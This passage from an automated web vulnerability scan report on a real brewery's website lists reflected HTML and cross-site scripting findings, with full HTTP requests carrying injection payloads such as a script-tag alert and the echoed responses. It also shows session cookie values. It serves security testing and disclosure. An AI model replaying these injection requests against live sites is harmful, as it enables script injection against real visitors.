<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersbecda"><a>fd1c2df5815_page" class="careersbecda">
...[SNIP]...

1.24. http://www.ninkasibrewing.com/careers/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd34a"><a>b8b6cd26d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersfd34a"><a>b8b6cd26d1a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersfd34a"><a>b8b6cd26d1a_page" class="careersfd34a">
...[SNIP]...

1.25. http://www.ninkasibrewing.com/careers/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b5f"><a>54c1eee5e30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersb4b5f"><a>54c1eee5e30/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersb4b5f"><a>54c1eee5e30_page" class="careersb4b5f">
...[SNIP]...

1.26. http://www.ninkasibrewing.com/careers/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ea2"><a>efc19015908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersd9ea2"><a>efc19015908/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersd9ea2"><a>efc19015908_page" class="careersd9ea2">
...[SNIP]...

1.27. http://www.ninkasibrewing.com/careers/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea81e"><a>7759b9fb197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersea81e"><a>7759b9fb197/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersea81e"><a>7759b9fb197_page" class="careersea81e">
...[SNIP]...

1.28. http://www.ninkasibrewing.com/careers/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87c5"><a>07d9d56d600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careerse87c5"><a>07d9d56d600/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careerse87c5"><a>07d9d56d600_page" class="careerse87c5">
...[SNIP]...

1.29. http://www.ninkasibrewing.com/company/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806cc"><a>6e5127e8258 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company806cc"><a>6e5127e8258/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company806cc"><a>6e5127e8258_page" class="company806cc">
...[SNIP]...

1.30. http://www.ninkasibrewing.com/company/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ab6"><a>2f1540286bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyd1ab6"><a>2f1540286bf/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companyd1ab6"><a>2f1540286bf_page" class="companyd1ab6">
...[SNIP]...

1.31. http://www.ninkasibrewing.com/company/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><a>c8816d8ff3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companye706a"><a>c8816d8ff3f/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companye706a"><a>c8816d8ff3f_page" class="companye706a">
...[SNIP]...

1.32. http://www.ninkasibrewing.com/company/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8fc"><a>5627c06183b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company5c8fc"><a>5627c06183b/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company5c8fc"><a>5627c06183b_page" class="company5c8fc">
...[SNIP]...

1.33. http://www.ninkasibrewing.com/company/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca1b"><a>883628057d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company7ca1b"><a>883628057d0/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company7ca1b"><a>883628057d0_page" class="company7ca1b">
...[SNIP]...

1.34. http://www.ninkasibrewing.com/company/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15af"><a>10c219e5d62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyf15af"><a>10c219e5d62/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companyf15af"><a>10c219e5d62_page" class="companyf15af">
...[SNIP]...

1.35. http://www.ninkasibrewing.com/company/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cc6"><a>4a3776524c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company95cc6"><a>4a3776524c8/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company95cc6"><a>4a3776524c8_page" class="company95cc6">
...[SNIP]...

1.36. http://www.ninkasibrewing.com/contact/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3673a"><a>3f6d411eb9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact3673a"><a>3f6d411eb9a/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact3673a"><a>3f6d411eb9a_page" class="contact3673a">
...[SNIP]...

1.37. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1f4"><script>alert(1)</script>795f4542f78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?4a1f4"><script>alert(1)</script>795f4542f78=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/?4a1f4"><script>alert(1)</script>795f4542f78=1" method="post">
...[SNIP]...

1.38. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d20c6"><a>9742955dd12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactd20c6"><a>9742955dd12/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contactd20c6"><a>9742955dd12_page" class="contactd20c6">
...[SNIP]...

1.39. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd65"><script>alert(1)</script>ad60b82afba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css" method="post">
...[SNIP]...

1.40. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42b42"><script>alert(1)</script>5fe47e91d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css" method="post">
...[SNIP]...

1.41. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dca"><script>alert(1)</script>7f9c03b7e41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/basic.cssa8dca"><script>alert(1)</script>7f9c03b7e41 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/basic.cssa8dca"><script>alert(1)</script>7f9c03b7e41" method="post">
...[SNIP]...

1.42. http://www.ninkasibrewing.com/contact/content/css/basic.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
